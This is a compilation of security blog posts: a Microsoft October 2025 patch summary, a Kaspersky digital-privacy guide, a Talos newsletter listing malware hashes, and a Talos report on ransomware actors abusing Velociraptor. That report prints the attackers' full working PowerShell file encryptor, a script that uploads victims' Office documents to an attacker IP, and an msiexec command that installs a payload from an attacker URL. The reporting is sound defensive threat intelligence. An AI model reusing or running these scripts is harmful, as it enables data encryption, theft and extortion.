Microsoft has released its monthly security update for October 2025, addressing 175 Microsoft CVEs and 21 non-Microsoft CVEs. Among these, 17 vulnerabilities are considered critical and 11 are flagged as important and considered more likely to be exploited. Current intelligence shows that three of the important vulnerabilities have already been detected in the wild.

In the following notes we provide a concise overview of the most significant issues, focusing on the vulnerabilities that could impact the widest user base or carry the highest severity.

Exploited in the Wild

Three vulnerabilities were confirmed to have been exploited in the wild.

CVE‑2025‑24990: Windows Agere Modem Driver Elevation of Privilege Vulnerability
Microsoft identified a flaw in the third‑party Agere Modem driver that ships with supported Windows operating systems. The driver was permanently removed in the October cumulative update. Users who rely on fax modem hardware that depends on this driver should uninstall any remaining components, as the affected driver is no longer supported.

CVE‑2025‑59230: Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
An improper access‑control check in Windows Remote Access Connection Manager allows an authorized attacker to gain elevated local privileges when accessing the service.

CVE‑2025‑47827: Secure Boot Bypass in IGEL OS before 11
This vulnerability permits a crafted root file-system to bypass Secure Boot on IGEL OS versions before 11 due to incorrect cryptographic signature verification performed by the igel-flash-driver module.

Critical Vulnerabilities

Microsoft marked 17 vulnerabilities as critical in this release. While these have not been observed exploited in the wild, their severity warrants prompt remediation.

CVE‑2025‑59287 Windows Server Update Service (WSUS) Remote Code Execution Vulnerability – Deserialization of untrusted data in WSUS allows an attacker to remotely execute code, potentially compromising the update service on vulnerable servers.

CVE‑2025‑59246, CVE‑2025‑59218  Azure Entra ID Elevation of Privilege Vulnerabilities – An attacker could exploit Azure Entra ID to elevate privileges, affecting the identity platform’s access control.

CVE‑2025‑0033 RMP Corruption During SNP Initialization – A race condition during Reverse Map Table initialization in AMD EPYC SEV‑SNP processors can allow a hypervisor with privileged control to modify RMP entries before they are locked. Azure Confidential Computing products contain multiple safeguards to prevent host compromise.

CVE‑2025‑59234 Microsoft Office Remote Code Execution Vulnerability – A use‑after‑free bug in Microsoft Office enables an attacker to execute code locally on an affected system, contingent on the presence of vulnerable content.

CVE‑2025‑49708 Microsoft Graphics Component Elevation of Privilege Vulnerability – An unauthenticated network attacker can manipulate the Graphics component through use‑after‑free logic to elevate privileges on a target machine.

CVE‑2025‑59291 Confidential Azure Container Instances Elevation of Privilege Vulnerability – External control of file names or paths in Confidential Azure Container Instances allows a privileged attacker to elevate privileges locally within the container environment.

CVE‑2025‑59292 Azure Compute Gallery Elevation of Privilege Vulnerability – Misuse of file names or paths can enable a privileged attacker to gain elevated rights in an Azure Compute Gallery context.

CVE‑2025‑59227 Microsoft Office Remote Code Execution Vulnerability – Exploitation of this vulnerability would allow remote execution on Office applications across multiple Windows versions.

CVE‑2025‑59247 Azure PlayFab Elevation of Privilege Vulnerability – PlayFab services can be manipulated by an unauthorized actor to elevate privileges, impacting the underlying Azure infrastructure.

CVE‑2025‑59252, CVE‑2025‑59272, CVE‑2025‑59286 Copilot Spoofing Vulnerabilities – Improper sanitization and encoding of user‑supplied data in Microsoft 365 Copilot leads to spoofing attacks.

CVE‑2025‑59271 Redis Enterprise Elevation of Privilege Vulnerability – Redis Enterprise servers may allow privileged escalation through a configuration oversight, impacting managed Azure Redis services.

CVE‑2025‑55321 Azure Monitor Log Analytics Spoofing Vulnerability – Cross‑site scripting (XSS) in Azure Monitor allows a network attacker to perform spoofing attacks within the Log Analytics portal.

CVE‑2025‑59236 Microsoft Excel Remote Code Execution Vulnerability – An unauthorized attacker could trigger a use‑after‑free in Microsoft Excel, causing local code execution on the target system.

CVE‑2016‑9535 LibTIFF Heap Buffer Overflow – The libtiff library contains a heap‑buffer‑overflow that can be triggered by malformed TIFF files, potentially allowing an attacker to execute arbitrary code under the user context.

Talos would also like to highlight 11 important vulnerabilities were considered more likely to be exploited: CVE‑2025‑48004, CVE‑2025‑24052, CVE‑2025‑55676, CVE‑2025‑55681, CVE‑2025‑58722, CVE‑2025‑59199, CVE‑2025‑55680, CVE‑2025‑55692, CVE‑2025‑55693, CVE‑2025‑55694 and CVE‑2025‑59194. They range from remote code execution to privilege escalation across both desktop and cloud environments.

Security teams are encouraged to examine the detailed advisory documents for each CVE to understand the exact scope and mitigations. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are:  65391 – 65410, 64420 – 65422.

The following Snort 3 rules are also available: 301325 – 301334.

Cisco Talos Blog – ​Read More

It’s frankly concerning just how much online services — and people we’ve never met — know about us. In fact, most of this data lands online because of us: the average internet user has dozens of accounts — if not hundreds.

That’s why doing a vanity search on yourself is so useful and eye-opening. Think about it: your digital footprint has been building up for years. Social media, message boards, old marketplace listings — everything you’ve ever typed is just sitting there, waiting to go off like a ticking time bomb.

Carelessly posted photos, videos, or even old comments have been known to go viral years later, causing serious retroactive problems for the poster. You might be thinking, “Who’d even care about me?” Well, trust us, plenty of folks would. This ranges from angry exes, advertisers, and scammers, all the way to potential employers and government agencies. HR departments routinely deep-dive into candidates’ histories before hiring. Furthermore, data found by using shadowy services that search for information leaked in data breaches is frequently used for doxing and harassment.

So, if you don’t manage it, your digital footprint can unexpectedly come back to bite you. Sure, it’s impossible to erase it completely, but you can certainly try to minimize the amount of information available to everyone. Today, we talk about how to scrub your digital footprint without sliding into full-blown paranoia. (Actually, we’ve got a few extra tips tucked away for the truly paranoid among you too!)

Start by googling yourself regularly

First things first: enter your first name and surname, email address, and main usernames into a search engine and see what pops up. Beyond doing manual searches, there are several useful tools that can help you find your account details across dozens, if not hundreds, of services and sites — most of which you’ve probably forgotten about. Some examples:

• Namechk is a service designed to check the availability of usernames across more than 90 social networks.
• Web Cleaner lets you search for yourself across dozens of search engines without having to manually enter the query into each one. What doesn’t show up in Google might easily be discovered on Bing, Yahoo, and others.

Why egosurf? By searching for yourself, you’ll first see exactly where you once registered (and perhaps forgot about), and second, you’ll be able to check for any fake or impersonating accounts using your name. If you do find an imposter account, contact the website’s support team and demand they remove the fake profiles. Be prepared to verify your identity to the support agent, but remain vigilant: there’s a risk of phishing scams that exploit the KYC (Know Your Customer) verification process.

Get rid of old accounts and posts

Once you’ve dealt with the fake accounts and compiled a list of your genuine ones, it’s time to delete the superfluous and outdated ones. The fewer dead accounts online holding your personal data, the better. Don’t rely entirely on the initial search or your own memory. Dig deep into your email archives to see which sites and services message you as their user. You can also review the list of saved passwords in your browsers or password managers.

I once discovered an account I made — on a gun forum, of all things — which I’d used only once to message another member. While those specific details might not have made me easier to hack, an attacker could easily have extracted the password from that old, likely vulnerable message board platform. If I had reused that password elsewhere, I’d be in trouble. This is exactly why you should set up a unique password for every new account and store it securely in a reliable app.

To quickly tackle old accounts, check out the open-source service Just Delete Me. It even has browser extensions for Chrome and Firefox. This tool shows how easy or difficult it is to delete your information on specific websites, helping you decide if the effort is worth the reward.

Dealing with shadow profiles

Unfortunately, the accounts you’ve registered are only half the battle. Sometimes social media sites generate shadow profiles containing data on you that may persist even after you delete your account. These profiles can include information you never directly shared with the service. For example, you might have granted the Facebook app access to your phone contacts without ever importing them into your account. All the data from your address book could end up in that shadow profile.

Even more unsettling, sometimes these accounts get created for users who’ve never even registered with the service, by gathering data from other platforms and open sources. While it’s nearly impossible to completely prevent shadow profiles from being created, you can definitely minimize the damage. Go through your old apps, and revoke their access to your sensitive data — things like your camera, photos, contacts, location, and so on. Going forward, meticulously monitor which permissions you grant to each new app.

If you discover that your Google, Apple or social media accounts are still linked to a third-party service you haven’t used in ages, go ahead and unlink them. These old connections always increase your risk of a data breach or leak.

Invoke your right to be forgotten

If your searches turn up links to compromising or false information about you, you can utilize your right to be forgotten. This right was established in Europe in 2014 with the introduction of the GDPR, and similar concepts exist in other countries.

Submit a request using the dedicated forms provided by search engines. Google, Bing, and others have these available online. Some search engines lack a transparent mechanism for removing personal data, so for those, you can try reaching out through their customer support chat.

While this cleanup of search results won’t actually remove the data from the original website, it will make the information significantly harder for the average person to find. If you need the actual data deleted, you must contact the owners of the websites where the information is posted. The service who.is can help here: it will show you whose name the domain is registered to. From there, it’s old-school OSINT: search for the site creator on social media, reach out privately, and try to negotiate a removal. If a friendly approach fails, you may need to use your country’s legal system as leverage.

Set up data breach notifications

Data leaks happen online virtually every day, exposing massive amounts of personal data: IP addresses, names, phone numbers, email addresses, payment info, and much more. Websites like Have I Been Pwned allow you to enter your email and get alerts if it shows up in a new leaked database.

However, for a comprehensive approach and greater convenience, it’s best to monitor leaks through Kaspersky Premium — we search for breaches using both email addresses and phone numbers. You can add all your email addresses and phone numbers (for yourself and your family) and be confident that we’ll warn you about a breach almost immediately, thanks to the Kaspersky Security Network (KSN) — our global threat intelligence infrastructure.

Unfortunately, preventing leaks single-handedly is an impossible task for the average user. So, the best defense is to limit how much personal data you share when registering new accounts.

Check internet archive services

Perhaps the most popular of these services is archive.org. Information you’ve deleted from other places might still be stored here, as the service takes snapshots of web pages and keeps them even after the original site is taken down.

Send an email to info@archive.org. Include the specific URL you want removed and specify the time period you wish to exclude from the archive. To ensure the data is deleted, explain your situation in detail. Clearly state that your personal data was posted without your consent.

Clean up your inbox

An email inbox overflowing with old messages that contain private information is also part of your digital footprint. Go through your mail using keywords like “password”, “SSN”, or “account”, and delete any emails containing this sensitive data. Unsubscribe from old mailing lists. This lowers the chance that your email address will leak from a marketer’s database. To safeguard the emails you need and to spot phishing attempts in time, use Kaspersky Premium.

Erase local traces

Don’t forget to regularly — at least once a month — clear your browser history, cookies, and cache on all your devices. Alternatively, set up your browser to clear this data automatically when you close it. This lessens the chance of an outsider collecting information from your device if they gain access to it.

On smartphones, you should disable or periodically reset your advertising identifier. Both Android and iOS privacy settings have options for this, which we discussed in detail in our post How smartphones build a dossier on you.

Review your privacy settings

If we were to break down all the privacy settings for every popular service, we’d need an entirely separate blog for that. Wait a second… we have one! The easiest way to check and adjust your privacy and security settings is through our free service, Privacy Checker. It will guide you on how to configure popular social platforms, services, and even operating systems to your desired level of privacy — ranging from the “Who cares about me?” mindset to the “Everyone is watching me” level.

Erase your nudes

If you find your intimate photos circulating online, or if an extortionist is threatening to share them with your contacts, don’t panic. Immediately reach out to StopNCII.org. And next time, only send intimate content to people you absolutely trust. Use secure messaging apps that offer an auto-delete feature for messages. When taking intimate photos, do so in a way that makes it impossible to identify you.

The “paranoid mode” bonus for the truly anxious

• If you want to leave no trace on the internet whatsoever, be ready to go fully offline, or at least severely restrict your digital life. This means no social media under your real name, and an absolute minimum of online services — only the essentials. For details on how to safely restrict your gadget usage, check out our post Digital detox: How to take a safe break from screens.
• Use messaging apps that feature end-to-end encryption and self-destructing messages. For search, use DuckDuckGo or Tor: that way your queries aren’t tied back to you. Ditch Gmail for encrypted email services that don’t require a phone number, like Temp Mail or Proton Mail. For smartphones, use a completely open OS that isn’t tied to Google/Apple (like GrapheneOS).
• To leave minimal digital tracks, rely on virtual machines running Whonix or Tails OS.
• If you know how to work with scripts, you can use them to fully purge your comments from social networks. Open-source scripts exist for platforms like Discord, Reddit, and Telegram.
• If you aren’t satisfied with half-measures, you can declare war on data brokers. These firms collect all available data about you to create a digital dossier, which they then sell. We detail who these brokers are and how to fight them in our post Why data brokers build dossiers on you, and how to stop them doing so.
• Finally, create multiple online personas: this is a radical but effective way to confuse data collectors. Use different names, birth dates and emails for different spheres of your life. Invent a separate alter ego for professional activity (with a clean résumé and neutral posts), and another for personal communication. The less the internet can tie your various activities together, the better for your privacy.

Ready for a safer digital life? We have a few more useful tips for you:

• How to shrink your digital footprint
• Geolocation data brokers: What they do and what happens when they leak
• Digital detox: How to take a safe break from screens
• Messengers 101: safety and privacy advice
• How to track anyone via the Find My network

Kaspersky official blog – ​Read More

Harnessing fire is one of mankind’s earliest technological advances. A controlled, tame fire offers us warmth, light and succulent cooked food. Yet, allow the controlled fire to burn too fiercely and it risks becoming an uncontained fire. The unexpected smell of smoke or the sight of tall flames provokes a deep fear within us and demands an instant response to contain and extinguish the fire, or to flee from its path.

We instinctively understand the benefits and dangers of fire. Through bitter experience we’ve learnt how to design and operate buildings to minimise the risks and maximise the survivability of fire. These lessons have become coded in rules and legislation which are often actively enforced and result in heavy sanctions for those who break them even before there is any evidence of a fire occurring.

In comparison, computer systems are a very recent technology. There are clear benefits to networked computer systems, we have come to rely on them to conduct many of the day-to-day tasks in our personal and professional lives. Yet, the dangers of computers are intangible. You can’t smell a software vulnerability or feel the burning heat of an active breach. Somehow their ethereal nature feels less pressing than the risk of fire and may to lead to complacency in addressing cyber threats.

The question of why we continue to experience cyber breaches despite having the technical know how to prevent them is one that fascinates me. I’m intrigued by the differences in decision making processes that leads to cyber risk either being prioritised or deprioritised within organisations. Indeed, so much so that this week I’m commencing a part-time doctorate to research this issue.

Frequently, cyber intelligence concentrates on the here and now, providing vital information to defend systems in the immediate term or near future. Threat intelligence must be timely. After all, it is better to have 80% of the intelligence in time than 100% too late. Yet, this rapid drum beat of needing to respond quickly can detract from the longer-term strategic intelligence issues of how the threat landscape is evolving and how we can improve our threat detection and response capabilities.

As a part-time student I have eight years to try and get a grip on how decisions in cyber security are made, and what makes a good decision. I’ll be certain to share my findings to help improve things, but don’t hold your breath, it will not be a fast process.

The one big thing

Cisco Talos has been closely monitoring the abuse of cascading style sheets (CSS) properties to include irrelevant content (or salt) in different parts of messages, a technique known as hidden text salting.

Why do I care?

There is widespread use of hidden text salting in malicious emails to bypass detection. Attackers embed hidden salt in the preheader, header, attachments and body — using characters, paragraphs and comments — by manipulating text, visibility and sizing properties. Talos has observed that hidden content is far more often found in spam and other email threats than in legitimate emails, posing a substantial challenge to both basic and advanced email defense solutions that leverage machine learning.

So now what? 

As explained with multiple examples, CSS provides a wide range of properties that can be abused by attackers to evade spam filters and detection engines. Therefore, two possible countermeasures are: first, to detect the presence of hidden text (or salt) in emails, and more importantly, to filter out the added salt before passing the message to downstream detection engines.

Top security headlines of the week

Physics Nobel Awarded to Three Scientists for Quantum Computing Breakthroughs
The 2025 Nobel Prize in Physics was awarded to three scientists for foundational work enabling quantum error correction — a cornerstone for stable, scalable quantum computers that could eventually undermine today’s encryption systems. (BBC)

Microsoft Defender Bug Triggers Erroneous BIOS Update Alerts
A bug in Microsoft Defender for Endpoint caused false vulnerability alerts related to Dell BIOS updates, leading to confusion among enterprise security teams. Microsoft confirmed the issue stems from a logic flaw in its vulnerability-fetching process. (Bleeping Computer)

Federal Government Acknowledges End of MS-ISAC Support
The U.S. federal government confirmed it will end funding for the Multi-State Information Sharing and Analysis Center (MS-ISAC), a program with a 20-year track record of helping state and local governments coordinate cybersecurity efforts. Advocates warn its loss will significantly weaken local cyber defense collaboration. (GovTech)

Can’t get enough Talos?

Footholds in Infrastructure: Defending Service Providers
Service providers sit at the heart of global connectivity… and the center of the threat landscape. In this short documentary, Cisco Talos explores the unique cybersecurity challenges faced by service providers.

Velociraptor leveraged in ransomware attacks
Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.

What to do when you click on a suspicious link
As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

Talos Takes: You can’t patch burnout 
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense.

Upcoming events where you can find Talos 

• Wild West Hackin’ Fest (Oct. 8 – 10) Deadwood, SD 
• DEEP Conference (Oct. 22 – 23) Petrčane, Croatia 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a
MD5: 1f7e01a3355b52cbc92c908a61abf643
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a
Example Filename: cleanup.bat
Detection Name: W32.D933EC4AAF-90.SBX.TG

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_1_Exe.exe
Detection Name: Win.Worm.Coinminer::1201

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
MD5: aac3165ece2959f39ff98334618d10d9
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe
Detection Name: W32.Injector:Gen.21ie.1201

SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
MD5: bf9672ec85283fdf002d83662f0b08b7
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
Example Filename: f_00db3a.html
Detection Name: W32.C0AD494457-95.SBX.TG

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_3_Exe.exe
Detection Name: Win.Dropper.Miner::95.sbx.tg

Cisco Talos Blog – ​Read More

• Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.  
• We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on overlapping tools and tactics, techniques, and procedures (TTPs)  
• Talos also observed evidence of Babuk ransomware files on the victim’s network, which has not been previously deployed by Storm-2603. 

In August 2025, Talos responded to a ransomware attack by actors who appeared to be affiliated with Warlock ransomware, based on their ransom note and use of Warlock’s data leak site (DLS). They deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines (VMs) and Windows servers. This severely impacted the customer’s IT environment. 

Velociraptor 

Velociraptor is designed for security teams to use for endpoint monitoring by deploying client agents across Windows, Linux and Mac systems to continuously collect data and respond to security events. 

Velociraptor played a significant role in this campaign, ensuring the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware. After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover. 

Threat actors have also reportedly leveraged Velociraptor to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server.  

The addition of this tool in the ransomware playbook is in line with findings from Talos’ 2024 Year in Review, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products. 

Attribution to Storm-2603 and ToolShell nexus 

Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell. 

Similar to the activity Talos observed in this engagement, Storm-2603 is known for deploying Warlock ransomware and Lockbit ransomware in the same engagement. While LockBit is widely deployed by a variety ransomware actors, Warlock was first advertised in June 2025 and has since been heavily used by Storm-2603. Additionally, it is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603. 

The threat actor in this engagement also mirrored several Storm-2603 TTPs, based on reporting by Microsoft: 

• Use of cmd.exe and batch scripts 
• Disabling Microsoft Defender protections 
• Creating scheduled tasks 
• Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies 
• Modifying Group Policy Objects (GPOs) 

While Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the ToolShell vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation.  

Campaign overview 

The first high-confidence indications of suspicious activity associated with this campaign occurred in mid-August 2025, with attempts to escalate privileges and move laterally within the compromised environment. We observed the threat actor creating admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller. The same actor-controlled admin account also accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs), which could allow for persistent access to the virtual environment. 

Notably, the threat actor installed an older version of Velociraptor on multiple servers to maintain persistence using the following command. We observed Velociraptor launching several times even after the host was isolated. 

msiexec  /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi 

The actors also executed the following command to run Smbexec, a Python script that comes with Impacket and allows an attacker to launch programs remotely using the SMB protocol: 

%COMSPEC% /Q /c echo cd ^> \%COMPUTERNAME%C$__output 2^>^&1 > %SYSTEMROOT%TkTvjYUp.bat & %COMSPEC% /Q /c %SYSTEMROOT%TkTvjYUp.bat & del %SYSTEMROOT%TkTvjYUp.bat  
C:WindowsSystem32cmd.exe cmd.exe /Q /c cmd /c c:windowstemp1.bat /y 1> WindowsTempsuLGnR 2>&1 

To impair defenses and evade detection, the actors modified Active Directory (AD) GPOs and: 

• Enabled “turn off real-time protection,” which continuously monitors for potential threats such as viruses, malware and spyware 
• Disabled “behavior monitoring,” which blocks suspicious activities by observing deviations from established patterns of normal behavior 
• Disabled “monitor file and program activity on your computer,” which observes how software behaves to identify patterns associated with malicious activity 

The actors deployed a fileless Powershell script that had an encryption functionality, which we believe was the primary encryptor that deployed mass encryption on the Windows machines:  

function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2/7/o4pMjgg4S838jw6aiRbag/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j/IMa6GNpMkVjsNPjvB/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB/M+bHFwgYkUG4rS2s/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"} 

After the script was deployed, Talos observed ransomware executables on Windows machines that were identified by EDR solutions as LockBit, and encrypted files with the Warlock extension “xlockxlock”. There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with “.babyk”. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting. 

The actors also conducted double extortion, exfiltrating data using the below PowerShell script. To evade detection, the exfiltration script shows that “$ProgressPreference” is set to “SilentlyContinue”, which suppresses any visual indication of the command’s progress. It also includes the “start-sleep” cmdlet, which suspends the script for a specified period of time. This cmdlet can be used to inhibit analysis, as many malware analysis tools, such as sandboxes, have a limited time window, and used to avoid triggering security alerts that might identify rapid, continuous script activity. 

function GR {$numbers = 1..20;$numbers | Get-Random }  
function Upfile { 
    param ( 
        [string]$path = "C:Users", 
        [int]$maxConcurrentJobs = 40  # 
    ) 
    Add-Type -AssemblyName System.Web 
    try { 
        $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |  
                Where-Object { $_.Length -lt 50MB } |  
                Select-Object -ExpandProperty FullName 
        $uploadScriptBlock = { 
            param ($file, $grValue) 
            try { 
                Add-Type -AssemblyName System.Web 
                $fileName = Split-Path -Path $file -Leaf 
                $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName) 
                $uploadUrl = "http[:]//65.38.121[.]226/test/$encodedFileName" 
                Write-Host "upload $file to $uploadUrl" 
                $ProgressPreference = 'SilentlyContinue' 
                $maxRetries = 3;$retryCount = 0 
while ($retryCount -lt $maxRetries) { 
            try { 
$wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, "PUT", $file) | Out-Null 
                Write-Host "upload Sucess $fileName" 
                break 
}  
catch { 
                $retryCount++ 
                Write-Host "upload $fileName retry $retryCount error: $_" 
                Start-Sleep -Seconds 2 
                }  
                finally {$wc.Dispose()}}}  
       catch  
            { 
                Write-Host "upload $fileName error: $_" 
            } 
            finally {$wc.Dispose()} 
        
        } 
        $grValue = GR 
        $jobs = @() 
        foreach ($file in $files) { 
            while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100} 
            $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue 
        } 
        $jobs | Wait-Job | ForEach-Object { 
            Receive-Job -Job $_ -Keep 
            Remove-Job -Job $_ 
        } 
    } catch { 
        Write-Host "getfile error: $_" 
    } 
} 
$drives = @("C:Users", "D:", "E:", "F:", "K:") 
foreach ($drive in $drives) { 
    if (Test-Path $drive) {Upfile -Path $drive   } 
    else {Write-Host "Drive $drive is not accessible." -ForegroundColor Yellow} 
} 

Mitigation recommendations 

Please see Talos’ Ransomware Primer for detailed recommendations on how to safeguard against ransomware threats. We also recommend referring to Talos’ blog on ToolShell for information on these vulnerabilities and how to patch them. Additionally, Rapid7 has published some recommendations on detecting velociraptor misuse.

MITRE ATT&CK techniques 

Resource Development  

• T1584.003 Compromise Infrastructure: Virtual Private Server 

Execution 

• T1059.001 PowerShell 

Persistence  

• T1136 Create Account 
• T1505.006 Server Software Component: vSphere Installation Bundles 

Privilege Escalation  

• T1098.007 Account Manipulation: Additional Local or Domain Groups 
• T1098 Account Manipulation 

Defense Evasion  

• T1556 Modify Authentication Process 
• T1484.001 Domain or Tenant Policy Modification: Group Policy Modification 

Lateral Movement  

• T1021.001 Remote Services: Remote Desktop Protocol 

Collection  

• T1213 Data from Information Repositories 

Exfiltration 

• T1041 Exfiltration Over C2 Channel 

Impact 

• T1486 Data Encrypted for Impact 
• T1657 Financial Theft 

Coverage

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

